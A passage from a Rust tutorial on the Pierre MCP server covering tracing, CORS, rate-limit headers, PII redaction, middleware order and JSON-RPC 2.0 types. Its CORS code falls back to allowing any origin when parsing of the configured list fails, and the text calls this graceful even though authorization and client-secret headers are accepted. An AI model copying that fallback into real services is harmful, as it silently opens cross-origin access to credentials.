let span = tracing::info_span!("request", user_id = tracing::field::Empty);
context.record_in_span(); // Now span has user_id field
}
Span Creation Utilities
The platform provides helpers for creating tracing spans with pre-configured fields:
Source: src/middleware/tracing.rs:69-110
#![allow(unused)]
fn main() {
/// Create a tracing span for HTTP requests
pub fn create_request_span(method: &str, path: &str) -> tracing::Span {
tracing::info_span!(
"http_request",
method = %method,
path = %path,
request_id = tracing::field::Empty,
user_id = tracing::field::Empty,
tenant_id = tracing::field::Empty,
auth_method = tracing::field::Empty,
status_code = tracing::field::Empty,
duration_ms = tracing::field::Empty,
)
}
/// Create a tracing span for MCP operations
pub fn create_mcp_span(operation: &str) -> tracing::Span {
tracing::info_span!(
"mcp_operation",
operation = %operation,
request_id = tracing::field::Empty,
user_id = tracing::field::Empty,
tenant_id = tracing::field::Empty,
tool_name = tracing::field::Empty,
duration_ms = tracing::field::Empty,
success = tracing::field::Empty,
)
}
/// Create a tracing span for database operations
pub fn create_database_span(operation: &str, table: &str) -> tracing::Span {
tracing::debug_span!(
"database_operation",
operation = %operation,
table = %table,
request_id = tracing::field::Empty,
user_id = tracing::field::Empty,
tenant_id = tracing::field::Empty,
duration_ms = tracing::field::Empty,
rows_affected = tracing::field::Empty,
)
}
}
Usage pattern:
#![allow(unused)]
fn main() {
async fn handle_request() -> Result<Response> {
let span = create_request_span("POST", "/api/activities");
let _guard = span.enter();
// All logs within this scope include span fields
tracing::info!("Processing activity request");
// Later: record additional fields
Span::current().record("status_code", 200);
Span::current().record("duration_ms", 42);
Ok(response)
}
}
CORS Configuration
The platform configures Cross-Origin Resource Sharing (CORS) for web client access:
Source: src/middleware/cors.rs:40-96
#![allow(unused)]
fn main() {
/// Configure CORS settings for the MCP server
///
/// Configures cross-origin requests based on `CORS_ALLOWED_ORIGINS` environment variable.
/// Supports both wildcard ("*") for development and specific origin lists for production.
pub fn setup_cors(config: &crate::config::environment::ServerConfig) -> CorsLayer {
// Parse allowed origins from configuration
let allow_origin =
if config.cors.allowed_origins.is_empty() || config.cors.allowed_origins == "*" {
// Development mode: allow any origin
AllowOrigin::any()
} else {
// Production mode: parse comma-separated origin list
let origins: Vec<HeaderValue> = config
.cors
.allowed_origins
.split(',')
.filter_map(|s| {
let trimmed = s.trim();
if trimmed.is_empty() {
None
} else {
HeaderValue::from_str(trimmed).ok()
}
})
.collect();
if origins.is_empty() {
// Fallback to any if parsing failed
AllowOrigin::any()
} else {
AllowOrigin::list(origins)
}
};
CorsLayer::new()
.allow_origin(allow_origin)
.allow_headers([
HeaderName::from_static("content-type"),
HeaderName::from_static("authorization"),
HeaderName::from_static("x-requested-with"),
HeaderName::from_static("accept"),
HeaderName::from_static("origin"),
HeaderName::from_static("access-control-request-method"),
HeaderName::from_static("access-control-request-headers"),
HeaderName::from_static("x-strava-client-id"),
HeaderName::from_static("x-strava-client-secret"),
HeaderName::from_static("x-fitbit-client-id"),
HeaderName::from_static("x-fitbit-client-secret"),
HeaderName::from_static("x-pierre-api-key"),
HeaderName::from_static("x-tenant-name"),
HeaderName::from_static("x-tenant-id"),
])
.allow_methods([
Method::GET,
Method::POST,
Method::PUT,
Method::DELETE,
Method::OPTIONS,
Method::PATCH,
])
}
}
Configuration examples:
# Development: allow all origins
export CORS_ALLOWED_ORIGINS="*"
# Production: specific origins only
export CORS_ALLOWED_ORIGINS="https://app.pierre.fitness,https://admin.pierre.fitness"
Security: The platform allows custom headers for:
- Provider OAuth:
x-strava-client-id,x-fitbit-client-idfor dynamic OAuth configuration - Multi-tenancy:
x-tenant-name,x-tenant-idfor tenant routing - API keys:
x-pierre-api-keyfor alternative authentication
Rust Idiom: filter_map for parsing
The CORS configuration uses filter_map to parse origin strings while skipping invalid entries:
#![allow(unused)]
fn main() {
config.cors.allowed_origins
.split(',')
.filter_map(|s| {
let trimmed = s.trim();
if trimmed.is_empty() {
None // Skip empty strings
} else {
HeaderValue::from_str(trimmed).ok() // Parse or skip invalid
}
})
.collect();
}
This handles malformed configuration gracefully without panicking.
Rate Limiting Headers
The platform adds standard HTTP rate limiting headers to all responses:
Source: src/middleware/rate_limiting.rs:17-32
#![allow(unused)]
fn main() {
/// HTTP header names for rate limiting
pub mod headers {
/// HTTP header name for maximum requests allowed in the current window
pub const X_RATE_LIMIT_LIMIT: &str = "X-RateLimit-Limit";
/// HTTP header name for remaining requests in the current window
pub const X_RATE_LIMIT_REMAINING: &str = "X-RateLimit-Remaining";
/// HTTP header name for Unix timestamp when rate limit resets
pub const X_RATE_LIMIT_RESET: &str = "X-RateLimit-Reset";
/// HTTP header name for rate limit window duration in seconds
pub const X_RATE_LIMIT_WINDOW: &str = "X-RateLimit-Window";
/// HTTP header name for rate limit tier information
pub const X_RATE_LIMIT_TIER: &str = "X-RateLimit-Tier";
/// HTTP header name for authentication method used
pub const X_RATE_LIMIT_AUTH_METHOD: &str = "X-RateLimit-AuthMethod";
/// HTTP header name for retry-after duration in seconds
pub const RETRY_AFTER: &str = "Retry-After";
}
}
Standard headers:
X-RateLimit-Limit: Total requests allowed (e.g., “5000”)X-RateLimit-Remaining: Requests left in window (e.g., “4832”)X-RateLimit-Reset: Unix timestamp when limit resets (e.g., “1706054400”)Retry-After: Seconds until reset for 429 responses (e.g., “3600”)
Custom headers:
X-RateLimit-Window: Duration in seconds (e.g., “2592000” for 30 days)X-RateLimit-Tier: User’s subscription tier (e.g., “free”, “premium”)X-RateLimit-AuthMethod: Authentication type (e.g., “JwtToken”, “ApiKey”)
Creating Rate Limit Headers
Source: src/middleware/rate_limiting.rs:34-82
#![allow(unused)]
fn main() {
/// Create a `HeaderMap` with rate limit headers
#[must_use]
pub fn create_rate_limit_headers(rate_limit_info: &UnifiedRateLimitInfo) -> HeaderMap {
let mut headers = HeaderMap::new();
// Add rate limit headers if we have the information
if let Some(limit) = rate_limit_info.limit {
if let Ok(header_value) = HeaderValue::from_str(&limit.to_string()) {
headers.insert(headers::X_RATE_LIMIT_LIMIT, header_value);
}
}
if let Some(remaining) = rate_limit_info.remaining {
if let Ok(header_value) = HeaderValue::from_str(&remaining.to_string()) {
headers.insert(headers::X_RATE_LIMIT_REMAINING, header_value);
}
}
if let Some(reset_at) = rate_limit_info.reset_at {
// Add reset timestamp as Unix epoch
let reset_timestamp = reset_at.timestamp();
if let Ok(header_value) = HeaderValue::from_str(&reset_timestamp.to_string()) {
headers.insert(headers::X_RATE_LIMIT_RESET, header_value);
}
// Add Retry-After header (seconds until reset)
let retry_after = (reset_at - chrono::Utc::now()).num_seconds().max(0);
if let Ok(header_value) = HeaderValue::from_str(&retry_after.to_string()) {
headers.insert(headers::RETRY_AFTER, header_value);
}
}
// Add tier and authentication method information
if let Ok(header_value) = HeaderValue::from_str(&rate_limit_info.tier) {
headers.insert(headers::X_RATE_LIMIT_TIER, header_value);
}
if let Ok(header_value) = HeaderValue::from_str(&rate_limit_info.auth_method) {
headers.insert(headers::X_RATE_LIMIT_AUTH_METHOD, header_value);
}
// Add rate limit window (always 30 days for monthly limits)
headers.insert(
headers::X_RATE_LIMIT_WINDOW,
HeaderValue::from_static("2592000"), // 30 days in seconds
);
headers
}
}
Error handling: All header insertions use if let Ok(...) to gracefully handle invalid header values. If conversion fails, the header is skipped rather than panicking.
Rust Idiom: HeaderValue::from_static
The X_RATE_LIMIT_WINDOW uses from_static for compile-time constant strings, avoiding runtime allocation. For dynamic values, use HeaderValue::from_str which validates UTF-8 and HTTP header constraints.
Rate Limit Error Responses
Source: src/middleware/rate_limiting.rs:84-111
#![allow(unused)]
fn main() {
/// Create a rate limit exceeded error response with proper headers
#[must_use]
pub fn create_rate_limit_error(rate_limit_info: &UnifiedRateLimitInfo) -> AppError {
let limit = rate_limit_info.limit.unwrap_or(0);
AppError::new(
ErrorCode::RateLimitExceeded,
format!(
"Rate limit exceeded. You have reached your limit of {} requests for the {} tier",
limit, rate_limit_info.tier
),
)
}
/// Helper function to check rate limits and return appropriate response
///
/// # Errors
///
/// Returns an error if the rate limit has been exceeded
pub fn check_rate_limit_and_respond(
rate_limit_info: &UnifiedRateLimitInfo,
) -> Result<(), AppError> {
if rate_limit_info.is_rate_limited {
Err(create_rate_limit_error(rate_limit_info))
} else {
Ok(())
}
}
}
Usage in handlers:
#![allow(unused)]
fn main() {
async fn api_handler(auth: AuthResult) -> Result<Json<Response>> {
// Check rate limit first
check_rate_limit_and_respond(&auth.rate_limit)?;
// Process request
let data = fetch_data().await?;
Ok(Json(Response { data }))
}
}
Pii Redaction and Data Protection
The platform redacts Personally Identifiable Information (PII) from logs to comply with GDPR, CCPA, and other privacy regulations:
Source: src/middleware/redaction.rs:38-95
#![allow(unused)]
fn main() {
bitflags! {
/// Redaction feature flags to control which types of data to redact
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub struct RedactionFeatures: u8 {
/// Redact HTTP headers (Authorization, Cookie, etc.)
const HEADERS = 0b0001;
/// Redact JSON body fields (client_secret, tokens, etc.)
const BODY_FIELDS = 0b0010;
/// Mask email addresses
const EMAILS = 0b0100;
/// Enable all redaction features
const ALL = Self::HEADERS.bits() | Self::BODY_FIELDS.bits() | Self::EMAILS.bits();
}
}
/// Configuration for PII redaction
#[derive(Debug, Clone)]
pub struct RedactionConfig {
/// Enable redaction globally (default: true in production, false in dev)
pub enabled: bool,
/// Which redaction features to enable
pub features: RedactionFeatures,
/// Replacement string for redacted sensitive data
pub redaction_placeholder: String,
}
impl Default for RedactionConfig {
fn default() -> Self {
Self {
enabled: true,
features: RedactionFeatures::ALL,
redaction_placeholder: "[REDACTED]".to_owned(),
}
}
}
impl RedactionConfig {
/// Create redaction config from environment
#[must_use]
pub fn from_env() -> Self {
let config = crate::constants::get_server_config();
let enabled = config.is_none_or(|c| c.logging.redact_pii);
let features = if enabled {
RedactionFeatures::ALL
} else {
RedactionFeatures::empty()
};
Self {
enabled,
features,
redaction_placeholder: config.map_or_else(
|| "[REDACTED]".to_owned(),
|c| c.logging.redaction_placeholder.clone(),
),
}
}
/// Check if redaction is disabled
#[must_use]
pub const fn is_disabled(&self) -> bool {
!self.enabled
}
}
}
Bitflags pattern: Using the bitflags! macro allows fine-grained control:
#![allow(unused)]
fn main() {
// Enable only header and email redaction, skip body fields
let features = RedactionFeatures::HEADERS | RedactionFeatures::EMAILS;
// Check if headers should be redacted
if features.contains(RedactionFeatures::HEADERS) {
redact_authorization_header();
}
}
Configuration:
# Disable PII redaction in development
export REDACT_PII=false
# Customize redaction placeholder
export REDACTION_PLACEHOLDER="***"
Sensitive Headers
The platform redacts sensitive HTTP headers before logging:
Authorization: JWT tokens and API keysCookie: Session cookiesX-API-Key: Alternative API key headerX-Strava-Client-Secret: Provider OAuth secretsX-Fitbit-Client-Secret: Provider OAuth secrets
Email Masking
Email addresses are masked to prevent PII leakage:
#![allow(unused)]
fn main() {
mask_email("john.doe@example.com")
// Returns: "j***@e***.com"
}
This preserves enough information for debugging (first letter and domain) while protecting user identity.
Middleware Ordering
Middleware order matters! The platform applies middleware in this sequence:
#![allow(unused)]
fn main() {
let app = Router::new()
.route("/api/activities", get(get_activities))
// 1. CORS (must be outermost for OPTIONS preflight)
.layer(setup_cors(&config))
// 2. Request ID (early for correlation)
.layer(middleware::from_fn(request_id_middleware))
// 3. Tracing (after request ID, before auth)
.layer(TraceLayer::new_for_http())
// 4. Authentication (extract user_id)
.layer(Extension(Arc::new(auth_middleware)))
// 5. Tenant isolation (requires user_id)
.layer(Extension(Arc::new(tenant_isolation)))
// 6. Rate limiting (requires auth context)
.layer(Extension(Arc::new(rate_limiter)));
}
Ordering rules:
- CORS first: Must handle OPTIONS preflight before other middleware
- Request ID early: Needed for all subsequent logs
- Tracing after ID: Span can include request ID immediately
- Auth before tenant: Need user_id to look up tenant
- Tenant before rate limit: Rate limits may be per-tenant
- Handlers last: Process after all middleware
Rust Idiom: Tower layers are applied bottom-to-top
Axum uses Tower’s Layer trait, which applies middleware in reverse order. The outermost .layer() call wraps the innermost. Visualize as:
CORS(RequestID(Tracing(Auth(Handler))))
Security Headers
The platform adds security headers to all responses:
X-Request-ID: Request correlation IDX-Content-Type-Options: nosniff: Prevent MIME sniffingX-Frame-Options: DENY: Prevent clickjackingStrict-Transport-Security: Force HTTPS (production only)Content-Security-Policy: Restrict resource loading
Example: Adding security headers in middleware:
#![allow(unused)]
fn main() {
pub async fn security_headers_middleware(req: Request, next: Next) -> Response {
let mut response = next.run(req).await;
let headers = response.headers_mut();
headers.insert(
HeaderName::from_static("x-content-type-options"),
HeaderValue::from_static("nosniff"),
);
headers.insert(
HeaderName::from_static("x-frame-options"),
HeaderValue::from_static("DENY"),
);
if is_production() {
headers.insert(
HeaderName::from_static("strict-transport-security"),
HeaderValue::from_static("max-age=31536000; includeSubDomains"),
);
}
response
}
}
Key Takeaways
-
Middleware stack: Layered architecture processes requests through CORS, request ID, tracing, auth, tenant isolation, and rate limiting before reaching handlers.
-
Request ID: Every request gets a UUID v4 for distributed tracing. Included in response headers and all log entries.
-
Request context:
RequestContextflows through the request lifecycle, accumulating user_id, tenant_id, and auth_method for structured logging. -
CORS configuration: Environment-driven origin allowlist supports development (
*) and production (specific domains). Custom headers for provider OAuth and multi-tenancy. -
Rate limit headers: Standard
X-RateLimit-*headers inform clients about usage limits.Retry-Aftertells clients when to retry 429 responses. -
PII redaction: Configurable redaction of authorization headers, email addresses, and sensitive JSON fields protects user privacy in logs.
-
Middleware ordering: CORS → Request ID → Tracing → Auth → Tenant → Rate Limit → Handler. Order matters for dependencies.
-
Span creation: Helper functions (
create_request_span,create_mcp_span,create_database_span) provide consistent tracing across the platform. -
Type-safe extensions: Axum’s extension system allows storing typed data (RequestId, RequestContext) in requests for handler access.
-
Security headers: Platform adds
X-Content-Type-Options,X-Frame-Options, andStrict-Transport-Securityto prevent common web vulnerabilities.
End of Part II: Authentication & Security
You’ve completed the authentication and security section of the Pierre platform tutorial. You now understand:
- Error handling with structured errors (Chapter 2)
- Configuration management (Chapter 3)
- Dependency injection with Arc (Chapter 4)
- Cryptographic key management (Chapter 5)
- JWT authentication with RS256 (Chapter 6)
- Multi-tenant database isolation (Chapter 7)
- Middleware and request context (Chapter 8)
Next Chapter: Chapter 09: JSON-RPC 2.0 Foundation - Begin Part III by learning how the Model Context Protocol (MCP) builds on JSON-RPC 2.0 for structured client-server communication.
Chapter 09: JSON-RPC 2.0 Foundation
JSON-RPC 2.0 Overview
JSON-RPC is a lightweight remote procedure call (RPC) protocol encoded in JSON. It’s stateless, transport-agnostic, and simple to implement.
Key characteristics:
- Stateless: Each request is independent (no session state)
- Transport-agnostic: Works over HTTP, WebSocket, stdin/stdout, SSE
- Bidirectional: Both client and server can initiate requests
- Simple: Only 4 message types (request, response, error, notification)
Protocol Structure
┌──────────────────────────────────────────────────────────┐
│ JSON-RPC 2.0 │
│ │
│ Client Server │
│ │ │ │
│ │ ─────── Request ──────► │ │
│ │ { │ │
│ │ "jsonrpc": "2.0", │ │
│ │ "method": "tools/call", │ │
│ │ "params": {...}, │ │
│ │ "id": 1 │ │
│ │ } │ │
│ │ │ │
│ │ ◄──── Response ──────── │ │
│ │ { │ │
│ │ "jsonrpc": "2.0", │ │
│ │ "result": {...}, │ │
│ │ "id": 1 │ │
│ │ } │ │
│ │ │ │
│ │ ─────── Notification ───► │ │
│ │ { │ │
│ │ "jsonrpc": "2.0", │ │
│ │ "method": "progress", │ │
│ │ "params": {...} │ │
│ │ (no id field) │ │
│ │ } │ │
└──────────────────────────────────────────────────────────┘
Source: src/jsonrpc/mod.rs:1-44
#![allow(unused)]
fn main() {
// ABOUTME: Unified JSON-RPC 2.0 implementation for all protocols (MCP, A2A)
// ABOUTME: Provides shared request, response, and error types eliminating duplication
//! # JSON-RPC 2.0 Foundation
//!
//! This module provides a unified implementation of JSON-RPC 2.0 used by
//! all protocols in Pierre (MCP, A2A). This eliminates duplication and
//! ensures consistent behavior across protocols.
//!
//! ## Design Goals
//!
//! 1. **Single Source of Truth**: One JSON-RPC implementation
//! 2. **Protocol Agnostic**: Works for MCP, A2A, and future protocols
//! 3. **Type Safe**: Strong typing with serde support
//! 4. **Extensible**: Metadata field for protocol-specific extensions
/// JSON-RPC 2.0 version string
pub const JSONRPC_VERSION: &str = "2.0";
}
Note: Pierre uses a unified JSON-RPC implementation shared by MCP and A2A protocols. This ensures consistent behavior across all protocol handlers.
Request Structure
A JSON-RPC request represents a method call from client to server or server to client:
Source: src/jsonrpc/mod.rs:51-78
#![allow(unused)]
fn main() {
/// JSON-RPC 2.0 Request
///
/// This is the unified request structure used by all protocols.
/// Protocol-specific extensions (like MCP/A2A's `auth_token`) are included as optional fields.
#[derive(Clone, Serialize, Deserialize)]
pub struct JsonRpcRequest {
/// JSON-RPC version (always "2.0")
pub jsonrpc: String,
/// Method name to invoke
pub method: String,
/// Optional parameters for the method
#[serde(skip_serializing_if = "Option::is_none")]
pub params: Option<Value>,
/// Request identifier (for correlation)
#[serde(skip_serializing_if = "Option::is_none")]
pub id: Option<Value>,
/// Authorization header value (Bearer token) - MCP/A2A extension
#[serde(rename = "auth", skip_serializing_if = "Option::is_none", default)]
pub auth_token: Option<String>,
/// Optional HTTP headers for tenant context and other metadata - MCP extension
#[serde(skip_serializing_if = "Option::is_none", default)]
pub headers: Option<HashMap<String, Value>>,
/// Protocol-specific metadata (additional extensions)
/// Not part of JSON-RPC spec, but useful for future extensions
#[serde(skip_serializing_if = "HashMap::is_empty", default)]
pub metadata: HashMap<String, String>,
}
// Custom Debug implementation that redacts sensitive auth tokens
impl fmt::Debug for JsonRpcRequest {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_struct("JsonRpcRequest")
.field("jsonrpc", &self.jsonrpc)
.field("method", &self.method)
.field("params", &self.params)
.field("id", &self.id)
.field(
"auth_token",
&self.auth_token.as_ref().map(|token| {
// Redact token: show first 10 and last 8 characters, or "[REDACTED]" if short
if token.len() > 20 {
format!("{}...{}", &token[..10], &token[token.len() - 8..])
} else {
"[REDACTED]".to_owned()
}
}),
)
.field("headers", &self.headers)
.field("metadata", &self.metadata)
.finish()
}
}
}
Standard fields (JSON-RPC 2.0 spec):
jsonrpc: Protocol version (“2.0”)method: Method name to invoke (e.g., “initialize”, “tools/call”)params: Optional parameters (JSON value)id: Request identifier for response correlation
Pierre extensions (not in JSON-RPC spec):
auth_token: JWT token for authentication (renamed to “auth” in JSON)headers: HTTP headers for tenant context (x-tenant-id, etc.)metadata: Key-value pairs for protocol-specific extensions
Rust Idiom: #[serde(skip_serializing_if = "Option::is_none")]
This attribute omits None values from JSON serialization. A request with no parameters serializes as {"jsonrpc": "2.0", "method": "ping"} instead of {"jsonrpc": "2.0", "method": "ping", "params": null}. This reduces message size and improves readability.
Custom Debug Implementation
The JsonRpcRequest provides a custom Debug impl that redacts auth tokens:
#![allow(unused)]
fn main() {
// Security: Custom Debug redacts sensitive tokens
impl fmt::Debug for JsonRpcRequest {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_struct("JsonRpcRequest")
.field("auth_token", &self.auth_token.as_ref().map(|token| {
if token.len() > 20 {
format!("{}...{}", &token[..10], &token[token.len() - 8..])
} else {
"[REDACTED]".to_owned()
}
}))
// ... other fields
.finish()
}
}
}
Security: This prevents JWT tokens from appearing in debug logs. If a developer calls dbg!(request) or logs {:?}, the token shows as "eyJhbGc...V6T6QMBv" instead of the full token.
Rust Idiom: Manual Debug implementation
Deriving Debug would print the full auth token. By implementing Debug manually, we control exactly what gets logged. This is a common pattern for types containing secrets.
Request Constructors
The platform provides builder methods for creating requests:
Source: src/jsonrpc/mod.rs:142-197
#![allow(unused)]
fn main() {
impl JsonRpcRequest {
/// Create a new JSON-RPC request
#[must_use]
pub fn new(method: impl Into<String>, params: Option<Value>) -> Self {
Self {
jsonrpc: JSONRPC_VERSION.to_owned(),
method: method.into(),
params,
id: Some(Value::Number(1.into())),
auth_token: None,
headers: None,
metadata: HashMap::new(),
}
}
/// Create a new request with a specific ID
#[must_use]
pub fn with_id(method: impl Into<String>, params: Option<Value>, id: Value) -> Self {
Self {
jsonrpc: JSONRPC_VERSION.to_owned(),
method: method.into(),
params,
id: Some(id),
auth_token: None,
headers: None,
metadata: HashMap::new(),
}
}
/// Create a notification (no ID, no response expected)
#[must_use]
pub fn notification(method: impl Into<String>, params: Option<Value>) -> Self {
Self {
jsonrpc: JSONRPC_VERSION.to_owned(),
method: method.into(),
params,
id: None,
auth_token: None,
headers: None,
metadata: HashMap::new(),
}
}
/// Add metadata to the request
#[must_use]
pub fn with_metadata(mut self, key: impl Into<String>, value: impl Into<String>) -> Self {
self.metadata.insert(key.into(), value.into());
self
}
/// Get metadata value
#[must_use]
pub fn get_metadata(&self, key: &str) -> Option<&String> {
self.metadata.get(key)
}
}
}
Usage patterns:
#![allow(unused)]
fn main() {
// Standard request with auto-generated ID
let request = JsonRpcRequest::new("initialize", Some(params));
// Request with specific ID for correlation
let request = JsonRpcRequest::with_id("tools/call", Some(params), Value::String("req-123".into()));
// Notification (fire-and-forget, no response expected)
let notification = JsonRpcRequest::notification("progress", Some(progress_data));
// Request with metadata
let request = JsonRpcRequest::new("initialize", Some(params))
.with_metadata("tenant_id", tenant_id.to_string())
.with_metadata("request_source", "web_ui");
}
Rust Idiom: Builder pattern with #[must_use]
The with_metadata method consumes self and returns the modified Self, enabling method chaining. The #[must_use] attribute warns if the returned value is ignored (preventing bugs where you call request.with_metadata(...) without assigning the result).
Response Structure
A JSON-RPC response represents the result of a method call:
Source: src/jsonrpc/mod.rs:105-257
#![allow(unused)]
fn main() {
/// JSON-RPC 2.0 Response
///
/// Represents a successful response or an error.
/// Exactly one of `result` or `error` must be present.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct JsonRpcResponse {
/// JSON-RPC version (always "2.0")
pub jsonrpc: String,
/// Result of the method call (mutually exclusive with error)
#[serde(skip_serializing_if = "Option::is_none")]
pub result: Option<Value>,
/// Error information (mutually exclusive with result)
#[serde(skip_serializing_if = "Option::is_none")]
pub error: Option<JsonRpcError>,
/// Request identifier for correlation
pub id: Option<Value>,
}
impl JsonRpcResponse {
/// Create a success response
#[must_use]
pub fn success(id: Option<Value>, result: Value) -> Self {
Self {
jsonrpc: JSONRPC_VERSION.to_owned(),
result: Some(result),
error: None,
id,
}
}
/// Create an error response
#[must_use]
pub fn error(id: Option<Value>, code: i32, message: impl Into<String>) -> Self {
Self {
jsonrpc: JSONRPC_VERSION.to_owned(),
result: None,
error: Some(JsonRpcError {
code,
message: message.into(),
data: None,
}),
id,
}
}
/// Create an error response with additional data
#[must_use]
pub fn error_with_data(
id: Option<Value>,
code: i32,
message: impl Into<String>,
data: Value,
) -> Self {
Self {
jsonrpc: JSONRPC_VERSION.to_owned(),
result: None,
error: Some(JsonRpcError {
code,
message: message.into(),
data: Some(data),
}),
id,
}
}
/// Check if this is a success response
#[must_use]
pub const fn is_success(&self) -> bool {
self.error.is_none() && self.result.is_some()
}
/// Check if this is an error response
#[must_use]
pub const fn is_error(&self) -> bool {
self.error.is_some()
}
}
}
Invariant: Exactly one of result or error must be Some. The JSON-RPC spec forbids responses with both fields set or both fields absent.
Success response example:
{
"jsonrpc": "2.0",
"result": {
"tools": [...]
},
"id": 1
}
Error response example:
{
"jsonrpc": "2.0",
"error": {
"code": -32601,
"message": "Method not found"
},
"id": 1
}
Error Structure
JSON-RPC errors contain a numeric code, human-readable message, and optional data:
Source: src/jsonrpc/mod.rs:126-140
#![allow(unused)]
fn main() {
/// JSON-RPC 2.0 Error Object
///
/// Standard error structure with code, message, and optional data.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct JsonRpcError {
/// Error code (standard codes: -32700 to -32600)
pub code: i32,
/// Human-readable error message
pub message: String,
/// Additional error information
#[serde(skip_serializing_if = "Option::is_none")]
pub data: Option<Value>,
}
}
Source: src/jsonrpc/mod.rs:259-279
#![allow(unused)]
fn main() {
impl JsonRpcError {
/// Create a new error
#[must_use]
pub fn new(code: i32, message: impl Into<String>) -> Self {
Self {
code,
message: message.into(),
data: None,
}
}
/// Create an error with data
#[must_use]
pub fn with_data(code: i32, message: impl Into<String>, data: Value) -> Self {
Self {
code,
message: message.into(),
data: Some(data),
}
}
}
}
Fields:
code: Integer error code (negative values reserved by spec)message: Human-readable descriptiondata: Optional structured error details (stack trace, validation errors, etc.)
Standard Error Codes
JSON-RPC 2.0 defines standard error codes in the -32700 to -32600 range:
Source: src/jsonrpc/mod.rs:281-303
#![allow(unused)]
fn main() {
/// Standard JSON-RPC error codes
pub mod error_codes {
/// Parse error - Invalid JSON
pub const PARSE_ERROR: i32 = -32700;
/// Invalid Request - Invalid JSON-RPC
pub const INVALID_REQUEST: i32 = -32600;
/// Method not found
pub const METHOD_NOT_FOUND: i32 = -32601;
/// Invalid params
pub const INVALID_PARAMS: i32 = -32602;
/// Internal error
pub const INTERNAL_ERROR: i32 = -32603;
/// Server error range start
pub const SERVER_ERROR_START: i32 = -32000;
/// Server error range end
pub const SERVER_ERROR_END: i32 = -32099;
}
}
Error code ranges:
-32700: Parse error (malformed JSON)-32600: Invalid request (valid JSON, invalid JSON-RPC)-32601: Method not found (unknown method name)-32602: Invalid params (method exists, params are wrong)-32603: Internal error (server-side failure)-32000to-32099: Server-specific errors (application-defined)
Usage example:
#![allow(unused)]
fn main() {
use pierre_mcp_server::jsonrpc::{JsonRpcResponse, error_codes};
// Method not found
let response = JsonRpcResponse::error(
Some(request_id),
error_codes::METHOD_NOT_FOUND,
"Method 'unknown_method' not found"
);
// Invalid params with error details
let response = JsonRpcResponse::error_with_data(
Some(request_id),
error_codes::INVALID_PARAMS,
"Missing required parameter 'provider'",
serde_json::json!({
"required_params": ["provider"],
"received_params": ["limit", "offset"]
})
);
}
Request Correlation with Ids
The id field correlates requests with responses in bidirectional communication:
Client ────────────────────────► Server
Request: {
"id": 1,
"method": "initialize"
}
Client ◄──────────────────────── Server
Response: {
"id": 1,
"result": {...}
}
Client ────────────────────────► Server
Request: {
"id": 2,
"method": "tools/list"
}
Client ◄──────────────────────── Server
Response: {
"id": 2,
"result": {...}
}
Correlation rules:
- Response
idmust match requestidexactly idcan be string, number, or null (but not missing)- Notifications have no
id(no response expected) - Server can process requests out-of-order (async)
Rust Idiom: Option<Value> for flexible ID types
Using serde_json::Value allows IDs to be:
#![allow(unused)]
fn main() {
Some(Value::Number(1.into())) // Numeric ID
Some(Value::String("req-123".into())) // String ID
Some(Value::Null) // Null ID (valid per spec)
None // Notification (no response)
}
Notifications (Fire-and-forget)
Notifications are requests without an id field. The server does not send a response:
Use cases:
- Progress updates (
notifications/progress) - Cancellation signals (
notifications/cancelled) - Log messages (
logging/logMessage) - Events that don’t require acknowledgment
Example:
{
"jsonrpc": "2.0",
"method": "notifications/progress",
"params": {
"progressToken": "tok-123",
"progress": 50,
"total": 100
}
}
Creating notifications:
#![allow(unused)]
fn main() {
let notification = JsonRpcRequest::notification(
"notifications/progress",
Some(serde_json::json!({
"progressToken": token,
"progress": current,
"total": total
}))
);
}
Rust Idiom: Pattern matching on id
Handlers distinguish notifications from requests:
#![allow(unused)]
fn main() {
match request.id {
None => {
// Notification - process without sending response
handle_notification(request);
}
Some(id) => {
// Request - send response with matching ID
let result = handle_request(request);
JsonRpcResponse::success(Some(id), result)
}
}
}
MCP Extensions to JSON-RPC
Pierre extends JSON-RPC with additional fields for authentication and multi-tenancy:
Auth_token Field
The auth_token field carries JWT authentication:
#![allow(unused)]
fn main() {
#[serde(rename = "auth", skip_serializing_if = "Option::is_none", default)]
pub auth_token: Option<String>,
}
JSON representation (note rename to “auth”):
{
"jsonrpc": "2.0",
"method": "tools/call",
"params": {...},
"id": 1,
"auth": "eyJhbGciOiJSUzI1NiIs..."
}
Note: The auth_token field (Rust name) serializes as "auth" (JSON name) via #[serde(rename = "auth")]. This keeps JSON messages concise while maintaining clear Rust naming.
Headers Field
The headers field carries HTTP-like metadata:
#![allow(unused)]
fn main() {
#[serde(skip_serializing_if = "Option::is_none", default)]
pub headers: Option<HashMap<String, Value>>,
}
JSON representation:
{
"jsonrpc": "2.0",
"method": "tools/call",
"params": {...},
"id": 1,
"headers": {
"x-tenant-id": "550e8400-e29b-41d4-a716-446655440000",
"x-tenant-name": "Acme Corp"
}
}
Use cases:
- Tenant identification (
x-tenant-id,x-tenant-name) - Request tracing (
x-request-id) - Feature flags (
x-enable-experimental)
Metadata Field
The metadata field provides protocol-specific extensions:
#![allow(unused)]
fn main() {
#[serde(skip_serializing_if = "HashMap::is_empty", default)]
pub metadata: HashMap<String, String>,
}
JSON representation:
{
"jsonrpc": "2.0",
"method": "initialize",
"params": {...},
"id": 1,
"metadata": {
"client_version": "1.2.3",
"platform": "macos",
"locale": "en-US"
}
}
Rust Idiom: #[serde(skip_serializing_if = "HashMap::is_empty")]
Empty hashmaps are omitted from JSON. A request with no metadata serializes without the "metadata" key, reducing message size.
MCP Protocol Implementation
The Pierre platform uses these JSON-RPC foundations to implement MCP:
Source: src/mcp/protocol.rs:40-48
#![allow(unused)]
fn main() {
/// MCP protocol handlers
pub struct ProtocolHandler;
// Re-export types from multitenant module to avoid duplication
pub use super::multitenant::{McpError, McpRequest, McpResponse};
/// Default ID for notifications and error responses that don't have a request ID
fn default_request_id() -> Value {
serde_json::Value::Number(serde_json::Number::from(0))
}
impl ProtocolHandler {
/// Supported MCP protocol versions (in preference order)
const SUPPORTED_VERSIONS: &'static [&'static str] = &["2025-06-18", "2024-11-05"];
}
Type aliases:
#![allow(unused)]
fn main() {
pub use super::multitenant::{McpError, McpRequest, McpResponse};
}
